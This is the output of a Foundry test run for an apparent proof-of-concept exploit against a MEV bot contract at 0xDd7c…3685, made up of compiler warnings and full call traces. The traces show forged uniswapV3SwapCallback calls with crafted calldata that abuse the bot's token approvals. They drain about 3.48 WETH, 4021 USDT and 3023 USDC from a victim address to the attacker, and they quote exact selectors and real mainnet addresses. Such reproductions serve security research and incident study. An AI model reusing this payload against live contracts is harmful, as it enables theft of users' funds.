Compiling 28 files with Solc 0.8.28
Solc 0.8.28 finished in 2.29s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:35:5:
   |
35 |     WETH9 private constant WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:36:5:
   |
36 |     IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:37:5:
   |
37 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:98:5:
   |
98 |     WETH9 private constant WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:99:5:
   |
99 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
   --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:100:5:
    |
100 |     IERC20 USDT = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:33:1:
   |
33 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:94:5:
   |
94 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:97:1:
   |
97 | contract Money is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
   --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:125:5:
    |
125 |     fallback() external payable {}
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
   --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:119:9:
    |
119 |         VulnContract.call(abi.encodeWithSelector(bytes4(0xfa461e33), -1, amount, data));
    |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
   --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:121:9:
    |
121 |         address(USDT).call(abi.encodeWithSelector(bytes4(0xa9059cbb), address(owner), USDT.balanceOf(address(this))));
    |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2024-07/MEVbot_0xdd7c_exp.sol:75:5:
   |
75 |     function getcodehash() public returns (bytes32) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 19773)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [19773] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return] 
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop] 

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 763.68ms (164.76µs CPU time)

Ran 1 test for src/test/2024-07/MEVbot_0xdd7c_exp.sol:ContractTest
[PASS] testExpolit() (gas: 3565157)
Logs:
  [Begin] Attacker WETH before exploit: 0.000000000000000000
  [Begin] Attacker USDT before exploit: 0.000000
  [Begin] Attacker USDC before exploit: 0.000000
  [End] Attacker WETH after exploit: 3.481082391664690024
  [End] Attacker USDT after exploit: 4021.323617
  [End] Attacker USDC after exploit: 3023.950886

Traces:
  [3639257] ContractTest::testExpolit()
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2444] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker WETH before exploit", val: 0, decimals: 18)
    ├─ [5031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2484] 0xdAC17F958D2ee523a2206206994597C13D831ec7::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDT before exploit", val: 0, decimals: 6)
    ├─ [9839] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [3164] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   ├─ [2381] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDC before exploit", val: 0, decimals: 6)
    ├─ [1057245] → new Money@0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C
    │   └─ ← [Return] 4507 bytes of code
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x0000000000E715268E0fe41ced1dd101Fc696355) [staticcall]
    │   └─ ← [Return] 3481082391664690024 [3.481e18]
    ├─ [95977] Money::attack(0x0000000000E715268E0fe41ced1dd101Fc696355, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 3481082391664690024 [3.481e18])
    │   ├─ [2215] ContractTest::getcodehash()
    │   │   └─ ← [Return] 0x406b958266b84c447312c11ecfab9a4e42b48fc47fa6441c4226b89fbde1e99a
    │   ├─ [35215] 0xDd7c2987686B21f656F036458C874D154A923685::uniswapV3SwapCallback(-1, 3481082391664690024 [3.481e18], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000e715268e0fe41ced1dd101fc6963550000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496406b958266b84c447312c11ecfab9a4e42b48fc47fa6441c4226b89fbde1e99a0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000002bc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000)
    │   │   ├─ [30125] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(0x0000000000E715268E0fe41ced1dd101Fc696355, Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C], 3481082391664690024 [3.481e18])
    │   │   │   ├─ emit Transfer(from: 0x0000000000E715268E0fe41ced1dd101Fc696355, to: Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C], value: 3481082391664690024 [3.481e18])
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop] 
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C]) [staticcall]
    │   │   └─ ← [Return] 3481082391664690024 [3.481e18]
    │   ├─ [23162] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3481082391664690024 [3.481e18])
    │   │   ├─ emit Transfer(from: Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3481082391664690024 [3.481e18])
    │   │   └─ ← [Return] true
    │   ├─ [3031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [12835] 0xdAC17F958D2ee523a2206206994597C13D831ec7::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Stop] 
    │   ├─ [3339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C]) [staticcall]
    │   │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C]) [delegatecall]
    │   │   │   └─ ← [Return] 0
    │   │   └─ ← [Return] 0
    │   ├─ [7452] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ [6663] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0) [delegatecall]
    │   │   │   ├─ emit Transfer(from: Money: [0x5FCdCdaC1f25bf6D3Fc9d715b7C8e5785fF9582C], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Stop] 
    ├─ [1057245] → new Money@0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F
    │   └─ ← [Return] 4507 bytes of code
    ├─ [3031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(0x0000000000E715268E0fe41ced1dd101Fc696355) [staticcall]
    │   └─ ← [Return] 4021323617 [4.021e9]
    ├─ [88933] Money::attack(0x0000000000E715268E0fe41ced1dd101Fc696355, 0xdAC17F958D2ee523a2206206994597C13D831ec7, 4021323617 [4.021e9])
    │   ├─ [2215] ContractTest::getcodehash()
    │   │   └─ ← [Return] 0x406b958266b84c447312c11ecfab9a4e42b48fc47fa6441c4226b89fbde1e99a
    │   ├─ [38605] 0xDd7c2987686B21f656F036458C874D154A923685::uniswapV3SwapCallback(-1, 4021323617 [4.021e9], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000e715268e0fe41ced1dd101fc6963550000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496406b958266b84c447312c11ecfab9a4e42b48fc47fa6441c4226b89fbde1e99a0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000002bdac17f958d2ee523a2206206994597c13d831ec7000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000)
    │   │   ├─ [33630] 0xdAC17F958D2ee523a2206206994597C13D831ec7::transferFrom(0x0000000000E715268E0fe41ced1dd101Fc696355, Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F], 4021323617 [4.021e9])
    │   │   │   ├─ emit Transfer(from: 0x0000000000E715268E0fe41ced1dd101Fc696355, to: Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F], value: 4021323617 [4.021e9])
    │   │   │   └─ ← [Stop] 
    │   │   └─ ← [Stop] 
    │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─ [1031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F]) [staticcall]
    │   │   └─ ← [Return] 4021323617 [4.021e9]
    │   ├─ [26801] 0xdAC17F958D2ee523a2206206994597C13D831ec7::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4021323617 [4.021e9])
    │   │   ├─ emit Transfer(from: Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4021323617 [4.021e9])
    │   │   └─ ← [Stop] 
    │   ├─ [3339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F]) [staticcall]
    │   │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F]) [delegatecall]
    │   │   │   └─ ← [Return] 0
    │   │   └─ ← [Return] 0
    │   ├─ [5452] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ [4663] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0) [delegatecall]
    │   │   │   ├─ emit Transfer(from: Money: [0x0E98f6F1665C0B973a3195826dfD46B5C3Dc072F], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Stop] 
    ├─ [1057245] → new Money@0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB
    │   └─ ← [Return] 4507 bytes of code
    ├─ [3339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x0000000000E715268E0fe41ced1dd101Fc696355) [staticcall]
    │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(0x0000000000E715268E0fe41ced1dd101Fc696355) [delegatecall]
    │   │   └─ ← [Return] 3023950886 [3.023e9]
    │   └─ ← [Return] 3023950886 [3.023e9]
    ├─ [93401] Money::attack(0x0000000000E715268E0fe41ced1dd101Fc696355, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 3023950886 [3.023e9])
    │   ├─ [2215] ContractTest::getcodehash()
    │   │   └─ ← [Return] 0x406b958266b84c447312c11ecfab9a4e42b48fc47fa6441c4226b89fbde1e99a
    │   ├─ [43139] 0xDd7c2987686B21f656F036458C874D154A923685::uniswapV3SwapCallback(-1, 3023950886 [3.023e9], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000e715268e0fe41ced1dd101fc6963550000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496406b958266b84c447312c11ecfab9a4e42b48fc47fa6441c4226b89fbde1e99a0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000002ba0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000)
    │   │   ├─ [38049] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0x0000000000E715268E0fe41ced1dd101Fc696355, Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB], 3023950886 [3.023e9])
    │   │   │   ├─ [37254] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(0x0000000000E715268E0fe41ced1dd101Fc696355, Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB], 3023950886 [3.023e9]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000E715268E0fe41ced1dd101Fc696355, to: Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB], value: 3023950886 [3.023e9])
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop] 
    │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─ [3031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [6835] 0xdAC17F958D2ee523a2206206994597C13D831ec7::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Stop] 
    │   ├─ [1339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB]) [staticcall]
    │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB]) [delegatecall]
    │   │   │   └─ ← [Return] 3023950886 [3.023e9]
    │   │   └─ ← [Return] 3023950886 [3.023e9]
    │   ├─ [25352] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3023950886 [3.023e9])
    │   │   ├─ [24563] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3023950886 [3.023e9]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: Money: [0x5eAEFe53006a9aea098e9b4D3EBe5b4E57164EDB], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3023950886 [3.023e9])
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Stop] 
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 3481082391664690024 [3.481e18]
    ├─ [444] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WETH after exploit", val: 3481082391664690024 [3.481e18], decimals: 18)
    ├─ [1031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 4021323617 [4.021e9]
    ├─ [484] 0xdAC17F958D2ee523a2206206994597C13D831ec7::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT after exploit", val: 4021323617 [4.021e9], decimals: 6)
    ├─ [1339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 3023950886 [3.023e9]
    │   └─ ← [Return] 3023950886 [3.023e9]
    ├─ [1164] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   ├─ [381] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDC after exploit", val: 3023950886 [3.023e9], decimals: 6)
    └─ ← [Stop] 

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 17.95s (15.04s CPU time)

Ran 2 test suites in 19.18s (18.72s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
